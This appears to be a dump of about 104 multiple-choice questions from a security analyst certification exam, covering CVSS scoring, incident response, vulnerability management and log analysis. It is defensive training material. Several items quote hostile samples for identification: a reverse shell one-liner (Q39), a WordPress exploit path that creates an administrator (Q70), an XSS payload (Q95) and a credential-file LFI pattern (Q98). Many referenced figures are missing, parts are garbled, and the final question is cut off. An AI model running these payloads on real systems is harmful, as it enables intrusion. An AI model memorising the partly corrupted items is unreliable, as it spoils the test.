1 -A recent zero-day vulnerability is being actively exploited, requires no user interaction

or privilege escalation, and has a significant impact to confidentiality and integrity but not
to availability. Which of the following CVE metrics would be most accurate for this zero-
day threat?

• A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
• B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
• C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
• D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

2 - Which of the following tools would work best to prevent the exposure of PII outside of
an organization?

• A. PAM
• B. IDS
• C. PKI
• D. DLP

3 - An organization conducted a web application vulnerability assessment against the

corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

• A. Set an HttpOnly flag to force communication by HTTPS

• B. Block requests without an X-Frame-Options header
• C. Configure an Access-Control-Allow-Origin header to authorized domains
• D. Disable the cross-origin resource sharing header
4 - Which of the following items should be included in a vulnerability scan report? (Choose
two.)

• A. Lessons learned
• B. Service-level agreement
• C. Playbook
• D. Affected hosts
• E. Risk score
• F. Education plan

5 - The Chief Executive Officer of an organization recently heard that exploitation of new
attacks in the industry was happening approximately 45 days after a patch was released.
Which of the following would best protect this organization?

• A. A mean time to remediate of 30 days

• B. A mean time to detect of 45 days
• C. A mean time to respond of 15 days
• D. Third-party application testing

6- A security analyst recently joined the team and is trying to determine which scripting
language is being used in a production script to determine if it is malicious. Given the
following script:

Which of the following scripting languages was used in the script?

• A. PowerShell
• B. Ruby
• C. Python
• D. Shell script

7 - A company's user accounts have been compromised. Users are also reporting that the
company's internal portal is sometimes only accessible through HTTP, other times; it is
accessible through HTTPS. Which of the following most likely describes the observed
activity?

• A. There is an issue with the SSL certificate causing port 443 to become
unavailable for HTTPS access
• B. An on-path attack is being performed by someone with internal access that
forces users into port 80
• C. The web server cannot handle an increasing amount of HTTPS requests so it
forwards users to port 80
• D. An error was caused by BGP due to new rules applied over the company's
internal routers
8 - A security analyst is tasked with prioritizing vulnerabilities for remediation. The
relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to
prioritize the remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the
Company shall prioritize confidentiality of data over availability of systems and data.
3. The Company shall prioritize patching of publicly available systems and services over
patching of internally available system.
According to the security policy, which of the following vulnerabilities should be the
highest priority to patch?

• A. Name: [Link] -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
• B. Name: [Link] -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
• C. Name: [Link] -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
• D. Name: [Link] -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System

9 - Which of the following will most likely ensure that mission-critical services are
available in the event of an incident?

• A. Business continuity plan

• B. Vulnerability management plan
• C. Disaster recovery plan
• D. Asset management plan

10 - The Chief Information Security Officer wants to eliminate and reduce shadow IT in
the enterprise. Several high-risk cloud applications are used that increase the risk to the
organization. Which of the following solutions will assist in reducing the risk?

• A. Deploy a CASB and enable policy enforcement

• B. Configure MFA with strict access
• C. Deploy an API gateway
• D. Enable SSO to the cloud applications
11 - An incident response team receives an alert to start an investigation of an internet
outage. The outage is preventing all users in multiple locations from accessing external
SaaS resources. The team determines the organization was impacted by a DDoS attack.
Which of the following logs should the team review first?

• A. CDN
• B. Vulnerability scanner
• C. DNS
• D. Web server

12 - A malicious actor has gained access to an internal network by means of social

engineering. The actor does not want to lose access in order to continue the attack.
Which of the following best describes the current stage of the Cyber Kill Chain that the
threat actor is currently operating in?

• A. Weaponization
• B. Reconnaissance
• C. Delivery
• D. Exploitation

13 - An analyst finds that an IP address outside of the company network that is being
used to run network and vulnerability scans across external-facing assets. Which of the
following steps of an attack framework is the analyst witnessing?

• A. Exploitation
• B. Reconnaissance
• C. Command and control
• D. Actions on objectives

14 - An incident response analyst notices multiple emails traversing the network that
target only the administrators of the company. The email contains a concealed URL that
leads to an unknown website in another country. Which of the following best describes
what is happening? (Choose two.)

• A. Beaconing
• B. Domain Name System hijacking
• C. Social engineering attack
• D. On-path attack
• E. Obfuscated links
• F. Address Resolution Protocol poisoning
15 - During security scanning, a security analyst regularly finds the same vulnerabilities in
a critical application. Which of the following recommendations would best mitigate this
problem if applied along the SDLC phase?

• A. Conduct regular red team exercises over the application in production

• B. Ensure that all implemented coding libraries are regularly checked
• C. Use application security scanning as part of the pipeline for the CI/CD flow
• D. Implement proper input validation for any data entry form

16 - An analyst is reviewing a vulnerability report and must make recommendations to the

executive team. The analyst finds that most systems can be upgraded with a reboot
resulting in a single downtime window. However, two of the critical systems cannot be
upgraded due to a vendor appliance that the company does not have access to. Which of
the following inhibitors to remediation do these systems and associated vulnerabilities
best represent?

• A. Proprietary systems
• B. Legacy systems
• C. Unsupported operating systems
• D. Lack of maintenance Windows

17 - The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

• A. An output of characters > and " as the parameters used m the attempt
• B. The vulnerable parameter ID [Link] and unfiltered
characters returned
• C. The vulnerable parameter and unfiltered or encoded characters passed > and "
as unsafe
• D. The vulnerable parameter and characters > and " with a reflected XSS attempt
18 - Which of the following is the best action to take after the conclusion of a security
incident to improve incident response in the future?

• A. Develop a call tree to inform impacted users

• B. Schedule a review with all teams to discuss what occurred
• C. Create an executive summary to update company leadership
• D. Review regulatory compliance with public relations for official notification

19 - A security analyst received a malicious binary file to analyze. Which of the following
is the best technique to perform the analysis?

• A. Code analysis
• B. Static analysis
• C. Reverse engineering
• D. Fuzzing

20 - An incident response team found IoCs in a critical server. The team needs to isolate
and collect technical evidence for further investigation. Which of the following pieces of
data should be collected first in order to preserve sensitive information before isolating
the server?

• A. Hard disk
• B. Primary boot partition
• C. Malicious files
• D. Routing table
• E. Static IP address

21 - Which of the following security operations tasks are ideal for automation?

• A. Suspicious file analysis:

Look for suspicious-looking graphics in a folder.
Create subfolders in the original folder based on category of graphics found.
Move the suspicious graphics to the appropriate subfolder
• B. Firewall IoC block actions:
Examine the firewall logs for IoCs from the most recently published zero-day
exploit
Take mitigating actions in the firewall to block the behavior found in the logs
Follow up on any false positives that were caused by the block rules
• C. Security application user errors:
Search the error logs for signs of users having trouble with the security
application

Look up the user's phone number -

Call the user to help with any questions about using the application

• D. Email header analysis:

Check the email header for a phishing confidence metric greater than or equal to
five
 Add the domain of sender to the block list
Move the email to quarantine

22- An organization has experienced a breach of customer transactions. Under the terms
of PCI DSS, which of the following groups should the organization report the breach to?

• A. PCI Security Standards Council

• B. Local law enforcement
• C. Federal law enforcement
• D. Card issuer

23 - Which of the following is the best metric for an organization to focus on given recent
investments in SIEM, SOAR, and a ticketing system?

• A. Mean time to detect

• B. Number of exploits by tactic
• C. Alert volume
• D. Quantity of intrusion attempts

24 - A company is implementing a vulnerability management program and moving from an

on-premises environment to a hybrid IaaS cloud environment. Which of the following
implications should be considered on the new hybrid environment?

• A. The current scanners should be migrated to the cloud

• B. Cloud-specific misconfigurations may not be detected by the current
scanners
• C. Existing vulnerability scanners cannot scan IaaS systems
• D. Vulnerability scans on cloud environments should be performed from the cloud

25 - A security alert was triggered when an end user tried to access a website that is not
allowed per organizational policy. Since the action is considered a terminable offense, the
SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the
web searches from the user's workstation, to build the case for the investigation. Which
of the following is the best way to ensure that the investigation complies with HR or
privacy policies?

• A. Create a timeline of events detailing the date stamps, user account hostname
and IP information associated with the activities
• B. Ensure that the case details do not reflect any user-identifiable information
Password protect the evidence and restrict access to personnel related to the
investigation
• C. Create a code name for the investigation in the ticketing system so that all
personnel with access will not be able to easily identify the case as an HR-related
investigation
• D. Notify the SOC manager for awareness after confirmation that the activity was
intentional
26 - Which of the following is the first step that should be performed when establishing a
disaster recovery plan?

• A. Agree on the goals and objectives of the plan

• B. Determine the site to be used during a disaster
• C. Demonstrate adherence to a standard disaster recovery process
• D. Identify applications to be run during a disaster

27 - A technician identifies a vulnerability on a server and applies a software patch. Which

of the following should be the next step in the remediation process?

• A. Testing
• B. Implementation
• C. Validation
• D. Rollback

28 - The analyst reviews the following endpoint log entry:

Which of the following has occurred?

• A. Registry change
• B. Rename computer
• C. New account introduced
• D. Privilege escalation

29 - A security program was able to achieve a 30% improvement in MTTR by integrating

security controls into a SIEM. The analyst no longer had to jump between tools. Which of
the following best describes what the security program did?

• A. Data enrichment
• B. Security control plane
• C. Threat feed combination
• D. Single pane of glass
30 - Due to reports of unauthorized activity that was occurring on the internal network, an
analyst is performing a network discovery. The analyst runs an Nmap scan against a
corporate network to evaluate which devices were operating in the environment. Given the
following output:

Which of the following choices should the analyst look at first?

• A. [Link] ([Link])
• B. [Link] ([Link])
• C. [Link] ([Link])
• D. [Link] ([Link])
• E. p4wnp1_aloa.lan ([Link])
31 - When starting an investigation, which of the following must be done first?

• A. Notify law enforcement

• B. Secure the scene
• C. Seize all related evidence
• D. Interview the witnesses

32 - Which of the following describes how a CSIRT lead determines who should be
communicated with and when during a security incident?

• A. The lead should review what is documented in the incident response policy or
plan
• B. Management level members of the CSIRT should make that decision
• C. The lead has the authority to decide who to communicate with at any t me
• D. Subject matter experts on the team should communicate with others within the
specified area of expertise

33 - A new cybersecurity analyst is tasked with creating an executive briefing on possible

threats to the organization. Which of the following will produce the data needed for the
briefing?

• A. Firewall logs
• B. Indicators of compromise
• C. Risk assessment
• D. Access control lists

34 - An analyst notices there is an internal device sending HTTPS traffic with additional
characters in the header to a known-malicious IP in another country. Which of the
following describes what the analyst has noticed?

• A. Beaconing
• B. Cross-site scripting
• C. Buffer overflow
• D. PHP traversal

35 - A security analyst is reviewing a packet capture in Wireshark that contains an FTP

session from a potentially compromised machine. The analyst sets the following display
filter: ftp. The analyst can see there are several RETR requests with 226 Transfer
complete responses, but the packet list pane is not showing the packets containing the
file transfer itself. Which of the following can the analyst perform to see the entire
contents of the downloaded files?

• A. Change the display filter to [Link]

• B. Change the display filter to [Link]==20
• C. Change the display filter to ftp-data and follow the TCP streams
• D. Navigate to the File menu and select FTP from the Export objects option
36 - A SOC manager receives a phone call from an upset customer. The customer
received a vulnerability report two hours ago: but the report did not have a follow-up
remediation response from an analyst. Which of the following documents should the SOC
manager review to ensure the team is meeting the appropriate contractual obligations for
the customer?

• A. SLA
• B. MOU
• C. NDA
• D. Limitation of liability

37 - Which of the following phases of the Cyber Kill Chain involves the adversary
attempting to establish communication with a successfully exploited target?

• A. Command and control

• B. Actions on objectives
• C. Exploitation
• D. Delivery

38 - A company that has a geographically diverse workforce and dynamic IPs wants to
implement a vulnerability scanning method with reduced network traffic. Which of the
following would best meet this requirement?

• A. External
• B. Agent-based
• C. Non-credentialed
• D. Credentialed

39 - A security analyst detects an exploit attempt containing the following command: sh -i

>& /dev/udp/[Link]/4821 0>$l
Which of the following is being attempted?

• A. RCE
• B. Reverse shell
• C. XSS
• D. SQL injection

40 - An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a
widely available exploit being used to deliver ransomware. Which of the following factors
would an analyst most likely communicate as the reason for this escalation?

• A. Scope
• B. Weaponization
• C. CVSS
• D. Asset value
41 - An analyst is reviewing a vulnerability report for a server environment with the
following entries:

Which of the following systems should be prioritized for patching first?

• A. [Link]
• B. [Link]
• C. [Link]
• D. [Link]
42 - A company is in the process of implementing a vulnerability management program,
and there are concerns about granting the security team access to sensitive data. Which
of the following scanning methods can be implemented to reduce the access to systems
while providing the most accurate vulnerability scan results?

• A. Credentialed network scanning

• B. Passive scanning
• C. Agent-based scanning
• D. Dynamic scanning

43 - A security analyst is trying to identify anomalies on the network routing. Which of the
following functions can the analyst use on a shell script to achieve the objective most
accurately?

• A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }

• B. function x() { info=$(ping -c 1 $1 | awk -F "/" ’END{print $5}’) && echo "$1 |
$info" }
• C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr"
’{print $1} ').[Link] TXT +short) && echo "$1 | $info" }
• D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo "$1 |
$info" }

44 - There are several reports of sensitive information being disclosed via file sharing
services. The company would like to improve its security posture against this threat.
Which of the following security controls would best support the company in this scenario?

• A. Implement step-up authentication for administrators

• B. Improve employee training and awareness
• C. Increase password complexity standards
• D. Deploy mobile device management

45 -Which of the following is the best way to begin preparation for a report titled "What
We Learned" regarding a recent incident involving a cybersecurity breach?

• A. Determine the sophistication of the audience that the report is meant for
• B. Include references and sources of information on the first page
• C. Include a table of contents outlining the entire report
• D. Decide on the color scheme that will effectively communicate the metrics
46 - A security analyst is performing an investigation involving multiple targeted Windows
malware binaries. The analyst wants to gather intelligence without disclosing information
to the attackers. Which of the following actions would allow the analyst to achieve the
objective?

• A. Upload the binary to an air gapped sandbox for analysis

• B. Send the binaries to the antivirus vendor
• C. Execute the binaries on an environment with internet connectivity
• D. Query the file hashes using VirusTotal

47 - Which of the following would help to minimize human engagement and aid in process
improvement in security operations?

• A. OSSTMM
• B. SIEM
• C. SOAR
• D. OWASP

48 - After conducting a cybersecurity risk assessment for a new software request, a Chief
Information Security Officer (CISO) decided the risk score would be too high. The CISO
refused the software request. Which of the following risk management principles did the
CISO select?

• A. Avoid
• B. Transfer
• C. Accept
• D. Mitigate

49 - Which of the following is an important aspect that should be included in the lessons-
learned step after an incident?

• A. Identify any improvements or changes in the incident response plan or

procedures
• B. Determine if an internal mistake was made and who did it so they do not repeat
the error
• C. Present all legal evidence collected and turn it over to iaw enforcement
• D. Discuss the financial impact of the incident to determine if security controls are
well spent

50 - The security operations team is required to consolidate several threat intelligence

feeds due to redundant tools and portals. Which of the following will best achieve the
goal and maximize results?

• A. Single pane of glass

• B. Single sign-on
• C. Data enrichment
• D. Deduplication
51 - Which of the following would a security analyst most likely use to compare TTPs
between different known adversaries of an organization?

• A. MITRE ATT&CK
• B. Cyber Kill Cham
• C. OWASP
• D. STIX/TAXII

52 - An analyst is remediating items associated with a recent incident. The analyst has
isolated the vulnerability and is actively removing it from the system. Which of the
following steps of the process does this describe?

• A. Eradication
• B. Recovery
• C. Containment
• D. Preparation

53 - Joe, a leading sales person at an organization, has announced on social media that
he is leaving his current role to start a new company that will compete with his current
employer. Joe is soliciting his current employer's customers. However, Joe has not
resigned or discussed this with his current supervisor yet. Which of the following would
be the best action for the incident response team to recommend?

• A. Isolate Joe's PC from the network

• B. Reimage the PC based on standard operating procedures
• C. Initiate a remote wipe of Joe's PC using mobile device management
• D. Perform no action until HR or legal counsel advises on next steps

54 - The Chief Information Security Officer is directing a new program to reduce attack
surface risks and threats as part of a zero trust approach. The IT security team is required
to come up with priorities for the program. Which of the following is the best priority
based on common attack frameworks?

• A. Reduce the administrator and privileged access accounts

• B. Employ a network-based IDS
• C. Conduct thorough incident response
• D. Enable SSO to enterprise applications

55 - During an extended holiday break, a company suffered a security incident. This

information was properly relayed to appropriate personnel in a timely manner and the
server was up to date and configured with appropriate auditing and logging. The Chief
Information Security Officer wants to find out precisely what happened. Which of the
following actions should the analyst take first?

• A. Clone the virtual server for forensic analysis

• B. Log m to the affected server and begin analysis of the logs
 • C. Restore from the last known-good backup to confirm there was no loss of
connectivity
• D. Shut down the affected server immediately

56 - A systems administrator is reviewing after-hours traffic flows from data-center

servers and sees regular outgoing HTTPS connections from one of the servers to a public
IP address. The server should not be making outgoing connections after hours. Looking
closer, the administrator sees this traffic pattern around the clock during work hours as
well. Which of the following is the most likely explanation?

• A. C2 beaconing activity
• B. Data exfiltration
• C. Anomalous activity on unexpected ports
• D. Network host IP address scanning
• E. A rogue network device

57 - New employees in an organization have been consistently plugging in personal

webcams despite the company policy prohibiting use of personal devices. The SOC
manager discovers that new employees are not aware of the company policy. Which of
the following will the SOC manager most likely recommend to help ensure new employees
are accountable for following the company policy?

• A. Human resources must email a copy of a user agreement to all new employees
• B. Supervisors must get verbal confirmation from new employees indicating they
have read the user agreement
• C. All new employees must take a test about the company security policy during
the onboardmg process
• D. All new employees must sign a user agreement to acknowledge the company
security policy

58 - An analyst has been asked to validate the potential risk of a new ransomware
campaign that the Chief Financial Officer read about in the newspaper. The company is a
manufacturer of a very small spring used in the newest fighter jet and is a critical piece of
the supply chain for this aircraft. Which of the following would be the best threat
intelligence source to learn about this new campaign?

• A. Information sharing organization

• B. Blogs/forums
• C. Cybersecurity incident response team
• D. Deep/dark web

59 - An incident response team finished responding to a significant security incident. The

management team has asked the lead analyst to provide an after-action report that
includes lessons learned. Which of the following is the most likely reason to include
lessons learned?

• A. To satisfy regulatory requirements for incident reporting

• B. To hold other departments accountable
 • C. To identify areas of improvement in the incident response process
• D. To highlight the notable practices of the organization's incident response team

60 - A vulnerability management team is unable to patch all vulnerabilities found during

their weekly scans. Using the third-party scoring system described below, the team
patches the most urgent vulnerabilities: c

Additionally, the vulnerability management team feels that the metrics Smear and
Channing are less important than the others, so these will be lower in priority. Which of
the following vulnerabilities should be patched first, given the above third-party scoring
system?

• A. InLoud:

Cobain: Yes -

Grohl: No -

Novo: Yes -

Smear: Yes -
Channing: No
• B. TSpirit:

Cobain: Yes -

Grohl: Yes -

Novo: Yes -

Smear: No -
Channing: No
• C. ENameless:

Cobain: Yes -

Grohl: No -

Novo: Yes -
 Smear: No -
Channing: No
• D. PBleach:

Cobain: Yes -

Grohl: No -

Novo: No -

Smear: No -
Channing: Yes

61 - A user downloads software that contains malware onto a computer that eventually
infects numerous other systems. Which of the following has the user become?

• A. Hacktivist
• B. Advanced persistent threat
• C. Insider threat
• D. Script kiddie

62 - An organization has activated the CSIRT. A security analyst believes a single virtual
server was compromised and immediately isolated from the network. Which of the
following should the CSIRT conduct next?

• A. Take a snapshot of the compromised server and verify its integrity

• B. Restore the affected server to remove any malware
• C. Contact the appropriate government agency to investigate
• D. Research the malware strain to perform attribution

63 - During an incident, an analyst needs to acquire evidence for later investigation. Which
of the following must be collected first in a computer system, related to its volatility level?

• A. Disk contents
• B. Backup data
• C. Temporary files
• D. Running processes

64 - A security analyst is trying to identify possible network addresses from different

source networks belonging to the same company and region. Which of the following shell
script functions could help achieve the goal?

• A. function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }
• B. function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }
• C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print
$1}’).[Link] TXT +short }
• D. function z() { c=$(geoiplookup$1) && echo “$1 | $c” }
65 - A security analyst is writing a shell script to identify IP addresses from the same
country. Which of the following functions would help the analyst achieve the objective?

• A. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 |
$info” }
• B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }
• C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }
• D. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 |
$info” }

66 - A security analyst obtained the following table of results from a recent vulnerability
assessment that was conducted against a single web server in the environment:

Which of the following should be completed first to remediate the findings?

• A. Ask the web development team to update the page contents

• B. Add the IP address allow listing for control panel access
• C. Purchase an appropriate certificate from a trusted root CA
• D. Perform proper sanitization on all Fields

67 - While reviewing web server logs, an analyst notices several entries with the same
time stamps, but all contain odd characters in the request line. Which of the following
steps should be taken next?

• A. Shut the network down immediately and call the next person in the chain of
command.
• B. Determine what attack the odd characters are indicative of.
• C. Utilize the correct attack framework and determine what the incident response
will consist of.
• D. Notify the local law enforcement for incident response.

68 - A security team conducts a lessons-learned meeting after struggling to determine

who should conduct the next steps following a security event. Which of the following
should the team create to address this issue?
 • A. Service-level agreement
• B. Change management plan
• C. Incident response plan
• D. Memorandum of understanding

69 - A cybersecurity analyst notices unusual network scanning activity coming from a

country that the company does not do business with. Which of the following is the best
mitigation technique?

• A. Geoblock the offending source country.

• B. Block the IP range of the scans at the network firewall.
• C. Perform a historical trend analysis and look for similar scanning activity.
• D. Block the specific IP address of the scans at the network firewall.

70 - An analyst has received an IPS event notification from the SIEM stating an IP
address, which is known to be malicious, has attempted to exploit a zero-day vulnerability
on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this
snippet?

• A. Limit user creation to administrators only.

• B. Limit layout creation to administrators only.
• C. Set the directory trx_addons to read only for all users.
• D. Set the directory V2 to read only for all users.

71 - A penetration tester submitted data to a form in a web application, which enabled the
penetration tester to retrieve user credentials. Which of the following should be
recommended for remediation of this application vulnerability?

• A. Implementing multifactor authentication on the server OS

• B. Hashing user passwords on the web application
• C. Performing input validation before allowing submission
• D. Segmenting the network between the users and the web server

72 - A cybersecurity team lead is developing metrics to present in the weekly executive

briefs. Executives are interested in knowing how long it takes to stop the spread of
malware that enters the network. Which of the following metrics should the team lead
include in the briefs?

• A. Mean time between failures

• B. Mean time to detect
• C. Mean time to remediate
• D. Mean time to contain
73 - An employee accessed a website that caused a device to become infected with
invasive malware. The incident response analyst has:

• created the initial evidence log.

• disabled the wireless adapter on the device.
• interviewed the employee, who was unable to identify the website that was accessed.
• reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

• A. Update the system firmware and reimage the hardware.

• B. Install an additional malware scanner that will send email alerts to the analyst.
• C. Configure the system to use a proxy server for Internet access.
• D. Delete the user profile and restore data from backup.

74 - A cloud team received an alert that unauthorized resources were being auto-
provisioned. After investigating, the team suspects that cryptomining is occurring. Which
of the following indicators would most likely lead the team to this conclusion?

• A. High GPU utilization

• B. Bandwidth consumption
• C. Unauthorized changes
• D. Unusual traffic spikes

75 - A company’s security team is updating a section of the reporting policy that pertains
to inappropriate use of resources (e.g., an employee who installs cryptominers on
workstations in the office). Besides the security team, which of the following groups
should the issue be escalated to first in order to comply with industry best practices?

• A. Help desk
• B. Law enforcement
• C. Legal department
• D. Board member

76 - Given the following CVSS string:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Which of the following attributes correctly describes this vulnerability?

• A. A user is required to exploit this vulnerability.

• B. The vulnerability is network based.
• C. The vulnerability does not affect confidentiality.
• D. The complexity to exploit the vulnerability is high.
77 - cryptocurrency service company is primarily concerned with ensuring the accuracy of
the data on one of its systems. A security analyst has been tasked with prioritizing
vulnerabilities for remediation for the system. The analyst will use the following CVSSv3.1
impact metrics for prioritization:

Which of the following vulnerabilities should be prioritized for remediation?

• A. 1
• B. 2
• C. 3
• D. 4

78 - Patches for two highly exploited vulnerabilities were released on the same Friday
afternoon. Information about the systems and vulnerabilities is shown in the tables
below:

Which of the following should the security analyst prioritize for remediation?

• A. rogers
• B. brady
• C. brees
 • D. manning

79 - A security analyst must preserve a system hard drive that was involved in a litigation
request. Which of the following is the best method to ensure the data on the device is not
modified?

• A. Generate a hash value and make a backup image.

• B. Encrypt the device to ensure confidentiality of the data.
• C. Protect the device with a complex password.
• D. Perform a memory scan dump to collect residual data

80 - Which of the following best describes the goal of a tabletop exercise?

• A. To test possible incident scenarios and how to react properly

• B. To perform attack exercises to check response effectiveness
• C. To understand existing threat actors and how to replicate their techniques
• D. To check the effectiveness of the business continuity plan

81 - A virtual web server in a server pool was infected with malware after an analyst used
the internet to research a system issue. After the server was rebuilt and added back into
the server pool, users reported issues with the website, indicating the site could not be
trusted. Which of the following is the most likely cause of the server issue?

• A. The server was configured to use SSL to securely transmit data.

• B. The server was supporting weak TLS protocols for client connections.
• C. The malware infected all the web servers in the pool.
• D. The digital certificate on the web server was self-signed.

82 - A zero-day command injection vulnerability was published. A security administrator

is analyzing the following logs for evidence of adversaries attempting to exploit the
vulnerability:

Which of the following log entries provides evidence of the attempted exploit?

• A. Log entry 1
• B. Log entry 2
• C. Log entry 3
• D. Log entry 4
83 - A security analyst needs to ensure that systems across the organization are
protected based on the sensitivity of the content each system hosts. The analyst is
working with the respective system owners to help determine the best methodology that
seeks to promote confidentiality, availability, and integrity of the data being hosted.
Which of the following should the security analyst perform first to categorize and
prioritize the respective systems?

• A. Interview the users who access these systems.

• B. Scan the systems to see which vulnerabilities currently exist.
• C. Configure alerts for vendor-specific zero-day exploits.
• D. Determine the asset value of each system.

84 - A security analyst is reviewing the following alert that was triggered by FIM on a
critical system:

Which of the following best describes the suspicious activity that is occurring?

• A. A fake antivirus program was installed by the user.

• B. A network drive was added to allow exfiltration of data.
• C. A new program has been set to execute on system start.
• D. The host firewall on [Link] was disabled.

85 - Which of the following best describes the document that defines the expectation to
network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

• A. SLA
• B. LOI
• C. MOU
• D. KPI

86 - A cybersecurity analyst is reviewing SIEM logs and observes consistent requests

originating from an internal host to a blocklisted external server. Which of the following
best describes the activity that is taking place?

• A. Data exfiltration
• B. Rogue device
• C. Scanning
• D. Beaconing
87 - An incident response team is working with law enforcement to investigate an active
web server compromise. The decision has been made to keep the server running and to
implement compensating controls for a period of time. The web service must be
accessible from the internet via the reverse proxy and must connect to a database server.
Which of the following compensating controls will help contain the adversary while
meeting the other requirements? (Choose two).

• A. Drop the tables on the database server to prevent data exfiltration.

• B. Deploy EDR on the web server and the database server to reduce the
adversary’s capabilities.
• C. Stop the httpd service on the web server so that the adversary can not use web
exploits.
• D. Use microsegmentation to restrict connectivity to/from the web and database
servers.
• E. Comment out the HTTP account in the /etc/passwd file of the web server.
• F. Move the database from the database server to the web server.

88 - An incident response team member is triaging a Linux server. The output is shown
below:

Which of the following is the adversary most likely trying to do?

• A. Create a backdoor root account named zsh.

• B. Execute commands through an unsecured service account.
• C. Send a beacon to a command-and-control server.
• D. Perform a denial-of-service attack on the web server.

89 - A SOC analyst identifies the following content while examining the output of a
debugger command over a client-server application:

getConnection(database01,"alpha" ,"AxTv.127GdCx94GTd");

Which of the following is the most likely vulnerability in this system?

• A. Lack of input validation

 • B. SQL injection
• C. Hard-coded credential
• D. Buffer overflow

90 - A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

• A. The host is not up or responding.

• B. The host is running excessive cipher suites.
• C. The host is allowing insecure cipher suites.
• D. The Secure Shell port on this host is closed.
91 - A managed security service provider is having difficulty retaining talent due to an
increasing workload caused by a client doubling the number of devices connected to the
network. Which of the following would best aid in decreasing the workload without
increasing staff?

• A. SIEM
• B. XDR
• C. SOAR
• D. EDR

92 - An employee is suspected of misusing a company-issued laptop. The employee has

been suspended pending an investigation by human resources. Which of the following is
the best step to preserve evidence?

• A. Disable the user’s network account and access to web resources.

• B. Make a copy of the files as a backup on the server.
• C. Place a legal hold on the device and the user’s network share.
• D. Make a forensic image of the device and create a SHA-1 hash.

93 - An analyst receives threat intelligence regarding potential attacks from an actor with
seemingly unlimited time and resources. Which of the following best describes the threat
actor attributed to the malicious activity?

• A. Insider threat
• B. Ransomware group
• C. Nation-state
• D. Organized crime

94 - A systems analyst is limiting user access to system configuration keys and values in
a Windows environment. Which of the following describes where the analyst can find
these configuration items?

• A. [Link]
• B. [Link]
• C. Master boot record
• D. Registry

95 - While reviewing web server logs, a security analyst found the following line:

< IMG SRC='vbscript:msgbox("test")' >

Which of the following malicious activities was attempted?

• A. Command injection
• B. XML injection
• C. Server-side request forgery
• D. Cross-site scripting
96 - A security analyst at a company called ACME Commercial notices there is outbound
traffic to a host IP that resolves to [Link] The site’s
standard VPN logon page is [Link]/logon. Which of the following is most likely
true?

• A. This is a normal password change URL.

• B. The security operations center is performing a routine password audit.
• C. A new VPN gateway has been deployed.
• D. A social engineering attack is underway.

97 - A security analyst is performing vulnerability scans on the network. The analyst

installs a scanner appliance, configures the subnets to scan, and begins the scan of the
network. Which of the following would be missing from a scan performed with this
configuration?

• A. Operating system version

• B. Registry key values
• C. Open ports
• D. IP address

98 - A security analyst discovers an LFI vulnerability that can be exploited to extract

credentials from the underlying host. Which of the following patterns can the security
analyst use to search the web server logs for evidence of exploitation of that particular
vulnerability?

• A. /etc/shadow
• B. curl localhost
• C. ; printenv
• D. cat /proc/self/

99 - A company is in the process of implementing a vulnerability management program.

Which of the following scanning methods should be implemented to minimize the risk of
OT/ICS devices malfunctioning due to the vulnerability identification process?

• A. Non-credentialed scanning
• B. Passive scanning
• C. Agent-based scanning
• D. Credentialed scanning

100 - A company receives a penetration test report summary from a third party. The report
summary indicates a proxy has some patches that need to be applied. The proxy is sitting
in a rack and is not being used, as the company has replaced it with a new one. The CVE
score of the vulnerability on the proxy is a 9.8. Which of the following best practices
should the company follow with this proxy?

• A. Leave the proxy as is.

• B. Decomission the proxy.
 • C. Migrate the proxy to the cloud.
• D. Patch the proxy.

101 - An analyst is examining events in multiple systems but is having difficulty

correlating data points. Which of the following is most likely the issue with the system?

• A. Access rights
• B. Network segmentation
• C. Time synchronization
• D. Invalid playbook

102 - An analyst recommends that an EDR agent collect the source IP address, make a
connection to the firewall, and create a policy to block the malicious source IP address
across the entire network automatically. Which of the following is the best option to help
the analyst implement this recommendation?

• A. SOAR
• B. SIEM
• C. SLA
• D. IoC

103 - An end-of-life date was announced for a widely used OS. A business-critical function
is performed by some machinery that is controlled by a PC, which is utilizing the OS that
is approaching the end-of-life date. Which of the following best describes a security
analyst’s concern?

• A. Any discovered vulnerabilities will not be remediated.

• B. An outage of machinery would cost the organization money.
• C. Support will not be available for the critical machinery.
• D. There are no compensating controls in place for the OS.

104 - Which of the following describes the best reason for conducting a root cause
analysis?

• A. The root cause analysis ensures that proper timelines were documented.
